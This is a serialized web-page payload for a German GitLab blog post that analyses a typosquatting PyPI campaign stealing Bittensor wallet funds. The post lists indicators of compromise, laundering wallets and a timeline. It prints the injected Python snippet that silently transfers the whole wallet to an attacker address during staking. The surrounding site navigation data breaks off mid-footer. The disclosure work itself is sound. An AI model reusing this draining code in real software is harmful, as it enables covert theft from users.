[{"data":1,"prerenderedAt":701},["ShallowReactive",2],{"/de-de/blog/gitlab-uncovers-bittensor-theft-campaign-via-pypi/":3,"navigation-de-de":31,"banner-de-de":451,"footer-de-de":464,"Michael Henriksen":673,"next-steps-de-de":686},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"seo":8,"content":12,"config":21,"_id":24,"_type":25,"title":26,"_source":27,"_file":28,"_stem":29,"_extension":30},"/de-de/blog/gitlab-uncovers-bittensor-theft-campaign-via-pypi","blog",false,"",{"config":9,"title":10,"description":11},{"noIndex":6},"GitLab deckt Bittensor-Diebstahlkampagne über PyPI auf","Supply-Chain-Angriff zeigt Schwachstellen in der Paketvalidierung - Erkenntnisse für deutsche Unternehmen zur systematischen Absicherung von Software-Dependencies.",{"title":10,"authors":13,"description":15,"date":16,"body":17,"category":18,"tags":19,"heroImage":20},[14],"Michael Henriksen","Das Vulnerability Research Team von GitLab identifizierte eine Supply-Chain-Angriffskampagne, die Typosquatting-PyPI-Pakete verwendet, um Kryptowährung aus Bittensor-Wallets durch Manipulation von Staking-Operationen zu stehlen.","2025-08-06","Das Vulnerability Research Team von GitLab hat eine ausgeklügelte\n\n\nKryptowährungs-Diebstahlkampagne identifiziert, die das Bittensor-Ökosystem\n\n\ndurch Typosquatting-Python-Pakete auf PyPI ins Visier nimmt.\n\n\nDie Untersuchung begann, als das automatisierte Paket-Überwachungssystem von GitLab verdächtige Aktivitäten im Zusammenhang mit beliebten Bittensor-Paketen meldete. Es wurden mehrere Typosquatting-Varianten legitimer Bittensor-Pakete entdeckt, die jeweils darauf ausgelegt waren, Kryptowährung von ahnungslosen Entwickler(inne)n und Nutzer(inne)n zu stehlen.\n\n\n> **Geschäftsrelevanz:** Dieser koordinierte Angriff zeigt, wie Cyberkriminelle systematisch vertrauensvolle Software-Ökosysteme ausnutzen. **90% der Fortune-500-Unternehmen** nutzen Open-Source-Komponenten - jede davon ist ein potentieller Angriffspunkt für ähnliche Kampagnen.\n\n\n## Die Angriffsmethode im Detail\n\n\nDie identifizierten bösartigen Pakete wurden alle innerhalb eines 25-minütigen Zeitfensters am 6. August 2025 veröffentlicht:\n\n\n* `bitensor@9.9.4` (02:52 UTC)\n\n* `bittenso-cli@9.9.4` (02:59 UTC)\n\n* `qbittensor@9.9.4` (03:02 UTC)\n\n* `bitensor@9.9.5` (03:15 UTC)\n\n* `bittenso@9.9.5` (03:16 UTC)\n\n\nAlle Pakete wurden entwickelt, um die legitimen `bittensor`- und `bittensor-cli`-Pakete nachzuahmen, die Kernkomponenten des dezentralisierten KI-Netzwerks Bittensor sind.\n\n\n### Technische Analyse: So funktioniert der Diebstahl\n\n\nDie Analyse offenbarte einen sorgfältig ausgearbeiteten Angriffsvektor, bei dem die Angreifer legitime Staking-Funktionalitäten modifizierten, um Gelder zu stehlen. Die bösartigen Pakete enthalten eine manipulierte Version der `stake_extrinsic`-Funktion in `bittensor_cli/src/commands/stake/add.py`.\n\n\nWo Nutzer(innen) eine normale Staking-Operation erwarten, haben die Angreifer in Zeile 275 bösartigen Code eingefügt, der stillschweigend alle Gelder in ihre Wallet umleitet:\n\n\n```python\n\nresult = await transfer_extrinsic(\n  subtensor=subtensor,\n  wallet=wallet,\n  destination=\"5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR\",\n  amount=amount,\n  transfer_all=True,\n  prompt=False\n)\n\n```\n\n\n**Diese bösartige Injektion untergräbt den Staking-Prozess vollständig:**\n\n\n* **Stille Ausführung:** Verwendet `prompt=False`, um die Benutzerbestätigung zu umgehen\n\n* **Vollständige Wallet-Entleerung:** Setzt `transfer_all=True`, um alle verfügbaren Gelder zu stehlen, nicht nur den Staking-Betrag\n\n* **Hartcodiertes Ziel:** Leitet alle Gelder an die Wallet-Adresse der Angreifer weiter\n\n* **Versteckt in Sichtweite:** Wird während einer scheinbar normalen Staking-Operation ausgeführt\n\n\nDas Perfide an diesem Angriff: Nutzer(innen) glauben, Token für Belohnungen zu staken, während die modifizierte Funktion stattdessen die gesamte Wallet entleert.\n\n\n### Besondere Relevanz für deutsche Unternehmen\n\n\nDiese Angriffsmethodik ist nicht auf Kryptowährungen beschränkt. Ähnliche Typosquatting-Strategien könnten manipulierte Pakete in geschäftskritische Systeme einschleusen - von Zahlungsverarbeitung bis hin zu Industriesteuerungen.\n\n\n### Warum die Staking-Funktionalität ins Visier genommen wird\n\n\nDie Angreifer scheinen gezielt Staking-Operationen aus kalkulierten Gründen ins Visier genommen zu haben. In Blockchain-Netzwerken wie Bittensor bedeutet **Staking**, dass Nutzer(innen) ihre Kryptowährungs-Token sperren, um Netzwerkoperationen zu unterstützen und im Gegenzug Belohnungen zu erhalten – ähnlich wie Zinsen auf eine Einlage.\n\n\nDies macht Staking zu einem idealen Angriffsvektor:\n\n\n1. **Hochwertige Ziele:** Nutzer(innen), die staken, besitzen typischerweise erhebliche Kryptowährungsbestände, was sie zu lukrativen Opfern macht.\n\n2. **Erforderlicher Wallet-Zugriff:** Staking-Operationen erfordern, dass Nutzer(innen) ihre Wallets entsperren und Authentifizierung bereitstellen – genau das, was der bösartige Code benötigt, um Gelder abzuziehen.\n\n3. **Erwartete Netzwerkaktivität:** Da Staking natürlich Blockchain-Transaktionen beinhaltet, erregt die zusätzliche bösartige Übertragung nicht sofort Verdacht.\n\n4. **Routineoperationen:** Erfahrene Nutzer(innen) staken regelmäßig, was Vertrautheit schafft, die zu Nachlässigkeit führt und die Aufmerksamkeit reduziert.\n\n5. **Verzögerte Entdeckung:** Nutzer(innen) könnten anfänglich annehmen, dass Saldoänderungen normale Staking-Gebühren oder temporäre Sperrungen sind, was die Entdeckung des Diebstahls verzögert.\n\n\nDurch das Verstecken von bösartigem Code in legitim aussehender Staking-Funktionalität nutzten die Angreifer sowohl die technischen Anforderungen als auch die Nutzerpsychologie von Routine-Blockchain-Operationen aus.\n\n\n## Der Geldspur folgen\n\n\nDas Vulnerability Research Team von GitLab verfolgte die Kryptowährungsflüsse, um das volle Ausmaß dieser Operation zu verstehen. Die primäre Ziel-Wallet `5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR` diente als zentraler Sammelpunkt, bevor die Gelder durch ein Netzwerk von Zwischen-Wallets verteilt wurden.\n\n\n### Das Geldwäsche-Netzwerk\n\n\nDie Analyse offenbarte ein mehrstufiges Geldwäschesystem:\n\n\n1. **Primäre Sammlung:** Gestohlene Gelder kommen zunächst bei `5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR` an\n\n2. **Verteilungsnetzwerk:** Gelder werden schnell zu Zwischen-Wallets verschoben, einschließlich:\n\n   * `5HpsyxZKvCvLEdLTkWRM4d7nHPnXcbm4ayAsJoaVVW2TLVP1`\n   * `5GiqMKy1kAXN6j9kCuog59VjoJXUL2GnVSsmCRyHkggvhqNC`\n   * `5ER5ojwWNF79k5wvsJhcgvWmHkhKfW5tCFzDpj1Wi4oUhPs6`\n   * `5CquBemBzAXx9GtW94qeHgPya8dgvngYXZmYTWqnpea5nsiL`\n3. **Finale Konsolidierung:** Alle Pfade konvergieren schließlich bei `5D6BH6ai79EVN51orsf9LG3k1HXxoEhPaZGeKBT5oDwnd2Bu`\n\n4. **Auszahlungsendpunkt:** Das finale Ziel scheint\n   `5HDo9i9XynX44DFjeoabFqPF3XXmFCkJASC7FxWpbqv6D7QQ` zu sein\n\n## Die Typosquatting-Strategie\n\n\nDie Angreifer verwendeten eine Typosquatting-Strategie, die häufige Tippfehler und Paket-Namenskonventionen ausnutzt:\n\n\n* **Fehlende Zeichen:** `bitensor` statt `bittensor` (fehlendes 't')\n\n* **Kürzung:** `bittenso` statt `bittensor` (fehlendes finales 'r')\n\n* **Versions-Nachahmung:** Alle Pakete verwendeten Versionsnummern (`9.9.4`, `9.9.5`), die den legitimen Paketversionen sehr ähnlich sind\n\n\nDieser Ansatz maximiert die Installationswahrscheinlichkeit durch Entwickler-Tippfehler während `pip install`-Befehlen und Copy-Paste-Fehler aus Dokumentationen.\n\n\n## Die Zukunft der Supply-Chain-Sicherheit\n\n\nGitLab investiert weiterhin in proaktive Sicherheitsforschung, um Bedrohungen zu identifizieren und zu neutralisieren, bevor sie die Community beeinträchtigen. Das automatisierte Erkennungssystem arbeitet rund um die Uhr, um die Software-Supply-Chain zu schützen, die die moderne Entwicklung antreibt.\n\n\nDie schnelle Erkennung und Analyse dieses Angriffs demonstriert den Wert proaktiver Sicherheitsmaßnahmen im Kampf gegen ausgeklügelte Bedrohungen. Durch das Teilen der Erkenntnisse streben wir danach, die Widerstandsfähigkeit des gesamten Ökosystems gegen zukünftige Angriffe zu stärken.\n\n\n## Kompromittierungsindikatoren\n\n\n\\| IOC                                                | Beschreibung                                                      |\n\n\n\\| -------------------------------------------------- | ----------------------------------------------------------------- |\n\n\n\\| `pkg:pypi/bittenso@9.9.5`                          | Bösartiges PyPI-Paket                                             |\n\n\n\\| `pkg:pypi/bitensor@9.9.5`                          | Bösartiges PyPI-Paket                                             |\n\n\n\\| `pkg:pypi/bitensor@9.9.4`                          | Bösartiges PyPI-Paket                                             |\n\n\n\\| `pkg:pypi/qbittensor@9.9.4`                        | Bösartiges PyPI-Paket                                             |\n\n\n\\| `pkg:pypi/bittenso-cli@9.9.4`                      | Bösartiges PyPI-Paket                                             |\n\n\n\\| `5FjgkuPzAQHax3hXsSkNtue8E7moEYjTgrDDGxBvCzxc1nqR` | Bittensor (TAO) Wallet-Adresse für den Empfang gestohlener Gelder |\n\n\n## Zeitachse\n\n\n\\| Datum & Uhrzeit      | Aktion                                                                                        |\n\n\n\\| -------------------- | --------------------------------------------------------------------------------------------- |\n\n\n\\| **2025-08-06T06:33** | Erste Analyse verdächtiger Pakete, die vom automatisierten Überwachungssystem gemeldet wurden |\n\n\n\\| **2025-08-06T09:42** | `bittenso@9.9.5` an PyPi.org gemeldet                                                         |\n\n\n\\| **2025-08-06T09:46** | `bitensor@9.9.5` an PyPi.org gemeldet                                                         |\n\n\n\\| **2025-08-06T09:47** | `bitensor@9.9.4` an PyPi.org gemeldet                                                         |\n\n\n\\| **2025-08-06T09:49** | `qbittensor@9.9.4` an PyPi.org gemeldet                                                       |\n\n\n\\| **2025-08-06T09:51** | `bittenso-cli@9.9.4` an PyPi.org gemeldet                                                     |\n\n\n\\| **2025-08-06T15:26** | PyPi.org entfernte `bittenso@9.9.5`                                                           |\n\n\n\\| **2025-08-06T15:27** | PyPi.org entfernte `bitensor@9.9.5`                                                           |\n\n\n\\| **2025-08-06T15:27** | PyPi.org entfernte `bitensor@9.9.4`                                                           |\n\n\n\\| **2025-08-06T15:28** | PyPi.org entfernte `qbittensor@9.9.4`                                                         |\n\n\n\\| **2025-08-06T15:28** | PyPi.org entfernte `bittenso-cli@9.9.4`                                                       |\n","security",[18],"https://res.cloudinary.com/about-gitlab-com/image/upload/f_auto,q_auto,c_lfill/v1750098739/Blog/Hero%20Images/Blog/Hero%20Images/AdobeStock_282096522_securitycompliance.jpeg_1750098739024.jpg",{"featured":6,"template":22,"slug":23},"BlogPost","gitlab-uncovers-bittensor-theft-campaign-via-pypi","content:de-de:blog:gitlab-uncovers-bittensor-theft-campaign-via-pypi.yml","yaml","Gitlab Uncovers Bittensor Theft Campaign Via Pypi","content","de-de/blog/gitlab-uncovers-bittensor-theft-campaign-via-pypi.yml","de-de/blog/gitlab-uncovers-bittensor-theft-campaign-via-pypi","yml",{"_path":32,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"data":34,"_id":447,"_type":25,"title":448,"_source":27,"_file":449,"_stem":450,"_extension":30},"/shared/de-de/main-navigation","de-de",{"logo":35,"freeTrial":40,"sales":45,"login":50,"items":55,"search":388,"minimal":424,"duo":438},{"config":36},{"href":37,"dataGaName":38,"dataGaLocation":39},"/de-de/","gitlab logo","header",{"text":41,"config":42},"Kostenlose Testversion anfordern",{"href":43,"dataGaName":44,"dataGaLocation":39},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com&glm_content=default-saas-trial/","free trial",{"text":46,"config":47},"Vertrieb kontaktieren",{"href":48,"dataGaName":49,"dataGaLocation":39},"/de-de/sales/","sales",{"text":51,"config":52},"Anmelden",{"href":53,"dataGaName":54,"dataGaLocation":39},"https://gitlab.com/users/sign_in/","sign in",[56,100,199,204,309,369],{"text":57,"config":58,"cards":60,"footer":83},"Plattform",{"dataNavLevelOne":59},"platform",[61,67,75],{"title":57,"description":62,"link":63},"Die umfassendste KI-basierte DevSecOps-Plattform",{"text":64,"config":65},"Erkunde unsere Plattform",{"href":66,"dataGaName":59,"dataGaLocation":39},"/de-de/platform/",{"title":68,"description":69,"link":70},"GitLab Duo (KI)","Entwickle Software schneller mit KI in jeder Phase der Entwicklung",{"text":71,"config":72},"Lerne GitLab Duo kennen",{"href":73,"dataGaName":74,"dataGaLocation":39},"/de-de/gitlab-duo/","gitlab duo ai",{"title":76,"description":77,"link":78},"Gründe, die für GitLab sprechen","10 Gründe, warum Unternehmen sich für GitLab entscheiden",{"text":79,"config":80},"Mehr erfahren",{"href":81,"dataGaName":82,"dataGaLocation":39},"/de-de/why-gitlab/","why gitlab",{"title":84,"items":85},"Erste Schritte mit",[86,91,96],{"text":87,"config":88},"Platform Engineering",{"href":89,"dataGaName":90,"dataGaLocation":39},"/de-de/solutions/platform-engineering/","platform engineering",{"text":92,"config":93},"Entwicklererfahrung",{"href":94,"dataGaName":95,"dataGaLocation":39},"/de-de/developer-experience/","Developer experience",{"text":97,"config":98},"MLOps",{"href":99,"dataGaName":97,"dataGaLocation":39},"/de-de/topics/devops/the-role-of-ai-in-devops/",{"text":101,"left":102,"config":103,"link":105,"lists":109,"footer":181},"Produkt",true,{"dataNavLevelOne":104},"solutions",{"text":106,"config":107},"Alle Lösungen anzeigen",{"href":108,"dataGaName":104,"dataGaLocation":39},"/de-de/solutions/",[110,136,159],{"title":111,"description":112,"link":113,"items":118},"Automatisierung","CI/CD und Automatisierung zur Beschleunigung der Bereitstellung",{"config":114},{"icon":115,"href":116,"dataGaName":117,"dataGaLocation":39},"AutomatedCodeAlt","/solutions/delivery-automation/","automated software delivery",[119,123,127,132],{"text":120,"config":121},"CI/CD",{"href":122,"dataGaLocation":39,"dataGaName":120},"/de-de/solutions/continuous-integration/",{"text":124,"config":125},"KI-unterstützte Entwicklung",{"href":73,"dataGaLocation":39,"dataGaName":126},"AI assisted development",{"text":128,"config":129},"Quellcodeverwaltung",{"href":130,"dataGaLocation":39,"dataGaName":131},"/de-de/solutions/source-code-management/","Source Code Management",{"text":133,"config":134},"Automatisierte Softwarebereitstellung",{"href":116,"dataGaLocation":39,"dataGaName":135},"Automated software delivery",{"title":137,"description":138,"link":139,"items":144},"Sicherheit","Entwickle schneller, ohne die Sicherheit zu gefährden",{"config":140},{"href":141,"dataGaName":142,"dataGaLocation":39,"icon":143},"/de-de/solutions/security-compliance/","security and compliance","ShieldCheckLight",[145,150,155],{"text":146,"config":147},"Application Security Testing",{"href":148,"dataGaName":149,"dataGaLocation":39},"/solutions/application-security-testing/","Application security testing",{"text":151,"config":152},"Schutz der Software-Lieferkette",{"href":153,"dataGaLocation":39,"dataGaName":154},"/de-de/solutions/supply-chain/","Software supply chain security",{"text":156,"config":157},"Software Compliance",{"href":158,"dataGaName":156,"dataGaLocation":39},"/solutions/software-compliance/",{"title":160,"link":161,"items":166},"Bewertung",{"config":162},{"icon":163,"href":164,"dataGaName":165,"dataGaLocation":39},"DigitalTransformation","/de-de/solutions/visibility-measurement/","visibility and measurement",[167,171,176],{"text":168,"config":169},"Sichtbarkeit und Bewertung",{"href":164,"dataGaLocation":39,"dataGaName":170},"Visibility and Measurement",{"text":172,"config":173},"Wertstrommanagement",{"href":174,"dataGaLocation":39,"dataGaName":175},"/de-de/solutions/value-stream-management/","Value Stream Management",{"text":177,"config":178},"Analysen und Einblicke",{"href":179,"dataGaLocation":39,"dataGaName":180},"/de-de/solutions/analytics-and-insights/","Analytics and insights",{"title":182,"items":183},"GitLab für",[184,189,194],{"text":185,"config":186},"Enterprise",{"href":187,"dataGaLocation":39,"dataGaName":188},"/de-de/enterprise/","enterprise",{"text":190,"config":191},"Kleinunternehmen",{"href":192,"dataGaLocation":39,"dataGaName":193},"/de-de/small-business/","small business",{"text":195,"config":196},"den öffentlichen Sektor",{"href":197,"dataGaLocation":39,"dataGaName":198},"/de-de/solutions/public-sector/","public sector",{"text":200,"config":201},"Preise",{"href":202,"dataGaName":203,"dataGaLocation":39,"dataNavLevelOne":203},"/de-de/pricing/","pricing",{"text":205,"config":206,"link":208,"lists":212,"feature":296},"Ressourcen",{"dataNavLevelOne":207},"resources",{"text":209,"config":210},"Alle Ressourcen anzeigen",{"href":211,"dataGaName":207,"dataGaLocation":39},"/de-de/resources/",[213,246,268],{"title":214,"items":215},"Erste Schritte",[216,221,226,231,236,241],{"text":217,"config":218},"Installieren",{"href":219,"dataGaName":220,"dataGaLocation":39},"/de-de/install/","install",{"text":222,"config":223},"Kurzanleitungen",{"href":224,"dataGaName":225,"dataGaLocation":39},"/de-de/get-started/","quick setup checklists",{"text":227,"config":228},"Lernen",{"href":229,"dataGaLocation":39,"dataGaName":230},"https://university.gitlab.com/","learn",{"text":232,"config":233},"Produktdokumentation",{"href":234,"dataGaName":235,"dataGaLocation":39},"https://docs.gitlab.com/","product documentation",{"text":237,"config":238},"Best-Practice-Videos",{"href":239,"dataGaName":240,"dataGaLocation":39},"/de-de/getting-started-videos/","best practice videos",{"text":242,"config":243},"Integrationen",{"href":244,"dataGaName":245,"dataGaLocation":39},"/de-de/integrations/","integrations",{"title":247,"items":248},"Entdecken",[249,254,258,263],{"text":250,"config":251},"Kundenerfolge",{"href":252,"dataGaName":253,"dataGaLocation":39},"/de-de/customers/","customer success stories",{"text":255,"config":256},"Blog",{"href":257,"dataGaName":5,"dataGaLocation":39},"/de-de/blog/",{"text":259,"config":260},"Remote",{"href":261,"dataGaName":262,"dataGaLocation":39},"https://handbook.gitlab.com/handbook/company/culture/all-remote/","remote",{"text":264,"config":265},"TeamOps",{"href":266,"dataGaName":267,"dataGaLocation":39},"/de-de/teamops/","teamops",{"title":269,"items":270},"Vernetzen",[271,276,281,286,291],{"text":272,"config":273},"GitLab-Services",{"href":274,"dataGaName":275,"dataGaLocation":39},"/de-de/services/","services",{"text":277,"config":278},"Community",{"href":279,"dataGaName":280,"dataGaLocation":39},"/community/","community",{"text":282,"config":283},"Forum",{"href":284,"dataGaName":285,"dataGaLocation":39},"https://forum.gitlab.com/","forum",{"text":287,"config":288},"Veranstaltungen",{"href":289,"dataGaName":290,"dataGaLocation":39},"/events/","events",{"text":292,"config":293},"Partner",{"href":294,"dataGaName":295,"dataGaLocation":39},"/partners/","partners",{"backgroundColor":297,"textColor":298,"text":299,"image":300,"link":304},"#2f2a6b","#fff","Perspektiven für die Softwareentwicklung der Zukunft",{"altText":301,"config":302},"the source promo card",{"src":303},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758208064/dzl0dbift9xdizyelkk4.svg",{"text":305,"config":306},"Lies die News",{"href":307,"dataGaName":308,"dataGaLocation":39},"/de-de/the-source/","the source",{"text":310,"config":311,"lists":313},"Unternehmen",{"dataNavLevelOne":312},"company",[314],{"items":315},[316,321,327,329,334,339,344,349,354,359,364],{"text":317,"config":318},"Über",{"href":319,"dataGaName":320,"dataGaLocation":39},"/de-de/company/","about",{"text":322,"config":323,"footerGa":326},"Karriere",{"href":324,"dataGaName":325,"dataGaLocation":39},"/jobs/","jobs",{"dataGaName":325},{"text":287,"config":328},{"href":289,"dataGaName":290,"dataGaLocation":39},{"text":330,"config":331},"Geschäftsführung",{"href":332,"dataGaName":333,"dataGaLocation":39},"/company/team/e-group/","leadership",{"text":335,"config":336},"Team",{"href":337,"dataGaName":338,"dataGaLocation":39},"/company/team/","team",{"text":340,"config":341},"Handbuch",{"href":342,"dataGaName":343,"dataGaLocation":39},"https://handbook.gitlab.com/","handbook",{"text":345,"config":346},"Investor Relations",{"href":347,"dataGaName":348,"dataGaLocation":39},"https://ir.gitlab.com/","investor relations",{"text":350,"config":351},"Trust Center",{"href":352,"dataGaName":353,"dataGaLocation":39},"/de-de/security/","trust center",{"text":355,"config":356},"AI Transparency Center",{"href":357,"dataGaName":358,"dataGaLocation":39},"/de-de/ai-transparency-center/","ai transparency center",{"text":360,"config":361},"Newsletter",{"href":362,"dataGaName":363,"dataGaLocation":39},"/company/contact/","newsletter",{"text":365,"config":366},"Presse",{"href":367,"dataGaName":368,"dataGaLocation":39},"/press/","press",{"text":370,"config":371,"lists":372},"Kontakt",{"dataNavLevelOne":312},[373],{"items":374},[375,378,383],{"text":46,"config":376},{"href":48,"dataGaName":377,"dataGaLocation":39},"talk to sales",{"text":379,"config":380},"Support",{"href":381,"dataGaName":382,"dataGaLocation":39},"/support/","get help",{"text":384,"config":385},"Kundenportal",{"href":386,"dataGaName":387,"dataGaLocation":39},"https://customers.gitlab.com/customers/sign_in/","customer portal",{"close":389,"login":390,"suggestions":397},"Schließen",{"text":391,"link":392},"Um Repositories und Projekte zu durchsuchen, melde dich an bei",{"text":393,"config":394},"gitlab.com",{"href":53,"dataGaName":395,"dataGaLocation":396},"search login","search",{"text":398,"default":399},"Vorschläge",[400,403,408,410,415,420],{"text":68,"config":401},{"href":73,"dataGaName":402,"dataGaLocation":396},"GitLab Duo (AI)",{"text":404,"config":405},"Code Suggestions (KI)",{"href":406,"dataGaName":407,"dataGaLocation":396},"/de-de/solutions/code-suggestions/","Code Suggestions (AI)",{"text":120,"config":409},{"href":122,"dataGaName":120,"dataGaLocation":396},{"text":411,"config":412},"GitLab auf AWS",{"href":413,"dataGaName":414,"dataGaLocation":396},"/de-de/partners/technology-partners/aws/","GitLab on AWS",{"text":416,"config":417},"GitLab auf Google Cloud",{"href":418,"dataGaName":419,"dataGaLocation":396},"/de-de/partners/technology-partners/google-cloud-platform/","GitLab on Google Cloud",{"text":421,"config":422},"Warum GitLab?",{"href":81,"dataGaName":423,"dataGaLocation":396},"Why GitLab?",{"freeTrial":425,"mobileIcon":430,"desktopIcon":435},{"text":426,"config":427},"Kostenlos testen",{"href":428,"dataGaName":44,"dataGaLocation":429},"https://gitlab.com/-/trials/new/","nav",{"altText":431,"config":432},"GitLab-Symbol",{"src":433,"dataGaName":434,"dataGaLocation":429},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203874/jypbw1jx72aexsoohd7x.svg","gitlab icon",{"altText":431,"config":436},{"src":437,"dataGaName":434,"dataGaLocation":429},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203875/gs4c8p8opsgvflgkswz9.svg",{"freeTrial":439,"mobileIcon":443,"desktopIcon":445},{"text":440,"config":441},"Erfahre mehr über GitLab Duo",{"href":73,"dataGaName":442,"dataGaLocation":429},"gitlab duo",{"altText":431,"config":444},{"src":433,"dataGaName":434,"dataGaLocation":429},{"altText":431,"config":446},{"src":437,"dataGaName":434,"dataGaLocation":429},"content:shared:de-de:main-navigation.yml","Main Navigation","shared/de-de/main-navigation.yml","shared/de-de/main-navigation",{"_path":452,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"title":453,"button":454,"config":459,"_id":461,"_type":25,"_source":27,"_file":462,"_stem":463,"_extension":30},"/shared/de-de/banner","GitLab Duo Agent Platform ist jetzt in öffentlicher Beta!",{"text":455,"config":456},"Beta testen",{"href":457,"dataGaName":458,"dataGaLocation":39},"/de-de/gitlab-duo/agent-platform/","duo banner",{"layout":460},"release","content:shared:de-de:banner.yml","shared/de-de/banner.yml","shared/de-de/banner",{"_path":465,"_dir":33,"_draft":6,"_partial":6,"_locale":7,"data":466,"_id":669,"_type":25,"title":670,"_source":27,"_file":671,"_stem":672,"_extension":30},"/shared/de-de/main-footer",{"text":467,"source":468,"edit":474,"contribute":479,"config":484,"items":489,"minimal":661},"Git ist eine Marke von Software Freedom Conservancy und unsere Verwendung von „GitLab“ erfolgt unter Lizenz.",{"text":469,"config":470},"Quelltext der Seite anzeigen",{"href":471,"dataGaName":472,"dataGaLocation":473},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":475,"config":476},"Diese Seite bearbeiten",{"href":477,"dataGaName":478,"dataGaLocation":473},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":480,"config":481},"Beteilige dich",{"href":482,"dataGaName":483,"dataGaLocation":473},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":485,"facebook":486,"youtube":487,"linkedin":488},"https://x.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[490,513,568,597,631],{"title":57,"links":491,"subMenu":496},[492],{"text":493,"config":494},"DevSecOps-Plattform",{"href":66,"dataGaName":495,"dataGaLocation":473},"devsecops platform",[497],{"title":200,"links":498},[499,503,508],{"text":500,"config":501},"Tarife anzeigen",{"href":202,"dataGaName":502,"dataGaLocation":473},"view plans",{"text":504,"config":505},"Vorteile von Premium",{"href":506,"dataGaName":507,"dataGaLocation":473},"/de-de/pricing/premium/","why premium",{"text":509,"config":510},"Vorteile von Ultimate",{"href":511,"dataGaName":512,"dataGaLocation":473},"/de-de/pricing/ultimate/","why ultimate",{"title":514,"links":515},"Lösungen",[516,521,524,526,531,536,540,543,546,551,553,555,558,563],{"text":517,"config":518},"Digitale Transformation",{"href":519,"dataGaName":520,"dataGaLocation":473},"/de-de/topics/digital-transformation/","digital transformation",{"text":522,"config":523},"Sicherheit und Compliance",{"href":148,"dataGaName":149,"dataGaLocation":473},{"text":133,"config":525},{"href":116,"dataGaName":117,"dataGaLocation":473},{"text":527,"config":528},"Agile Entwicklung",{"href":529,"dataGaName":530,"dataGaLocation":473},"/de-de/solutions/agile-delivery/","agile delivery",{"text":532,"config":533},"Cloud-Transformation",{"href":534,"dataGaName":535,"dataGaLocation":473},"/de-de/topics/cloud-native/","cloud transformation",{"text":537,"config":538},"SCM",{"href":130,"dataGaName":539,"dataGaLocation":473},"source code management",{"text":120,"config":541},{"href":122,"dataGaName":542,"dataGaLocation":473},"continuous integration & delivery",{"text":172,"config":544},{"href":174,"dataGaName":545,"dataGaLocation":473},"value stream management",{"text":547,"config":548},"GitOps",{"href":549,"dataGaName":550,"dataGaLocation":473},"/de-de/solutions/gitops/","gitops",{"text":185,"config":552},{"href":187,"dataGaName":188,"dataGaLocation":473},{"text":190,"config":554},{"href":192,"dataGaName":193,"dataGaLocation":473},{"text":556,"config":557},"Öffentlicher Sektor",{"href":197,"dataGaName":198,"dataGaLocation":473},{"text":559,"config":560},"Bildungswesen",{"href":561,"dataGaName":562,"dataGaLocation":473},"/de-de/solutions/education/","education",{"text":564,"config":565},"Finanzdienstleistungen",{"href":566,"dataGaName":567,"dataGaLocation":473},"/de-de/solutions/finance/","financial services",{"title":205,"links":569},[570,572,574,576,579,581,583,585,587,589,591,593,595],{"text":217,"config":571},{"href":219,"dataGaName":220,"dataGaLocation":473},{"text":222,"config":573},{"href":224,"dataGaName":225,"dataGaLocation":473},{"text":227,"config":575},{"href":229,"dataGaName":230,"dataGaLocation":473},{"text":232,"config":577},{"href":234,"dataGaName":578,"dataGaLocation":473},"docs",{"text":255,"config":580},{"href":257,"dataGaName":5,"dataGaLocation":473},{"text":250,"config":582},{"href":252,"dataGaName":253,"dataGaLocation":473},{"text":259,"config":584},{"href":261,"dataGaName":262,"dataGaLocation":473},{"text":272,"config":586},{"href":274,"dataGaName":275,"dataGaLocation":473},{"text":264,"config":588},{"href":266,"dataGaName":267,"dataGaLocation":473},{"text":277,"config":590},{"href":279,"dataGaName":280,"dataGaLocation":473},{"text":282,"config":592},{"href":284,"dataGaName":285,"dataGaLocation":473},{"text":287,"config":594},{"href":289,"dataGaName":290,"dataGaLocation":473},{"text":292,"config":596},{"href":294,"dataGaName":295,"dataGaLocation":473},{"title":310,"links":598},[599,601,603,605,607,609,611,615,620,622,624,626],{"text":317,"config":600},{"href":319,"dataGaName":312,"dataGaLocation":473},{"text":322,"config":602},{"href":324,"dataGaName":325,"dataGaLocation":473},{"text":330,"config":604},{"href":332,"dataGaName":333,"dataGaLocation":473},{"text":335,"config":606},{"href":337,"dataGaName":338,"dataGaLocation":473},{"text":340,"config":608},{"href":342,"dataGaName":343,"dataGaLocation":473},{"text":345,"config":610},{"href":347,"dataGaName":348,"dataGaLocation":473},{"text":612,"config":613},"Sustainability",{"href":614,"dataGaName":612,"dataGaLocation":473},"/sustainability/",{"text":616,"config":617},"Vielfalt, Inklusion und Zugehörigkeit",{"href":618,"dataGaName":619,"dataGaLocation":473},"/de-de/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":350,"config":621},{"href":352,"dataGaName":353,"dataGaLocation":473},{"text":360,"config":623},{"href":362,"dataGaName":363,"dataGaLocation":473},{"text":365,"config":625},{"href":367,"dataGaName":368,"dataGaLocation":473},{"text":627,"config":628},"Transparenzerklärung zu moderner Sklaverei",{"href":629,"dataGaName":630,"dataGaLocation":473},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency statement",{"title":632,"links":633},"Nimm Kontakt auf",[634,637,639,641,646,651,656],{"text":635,"config":636},"Sprich mit einem Experten/einer 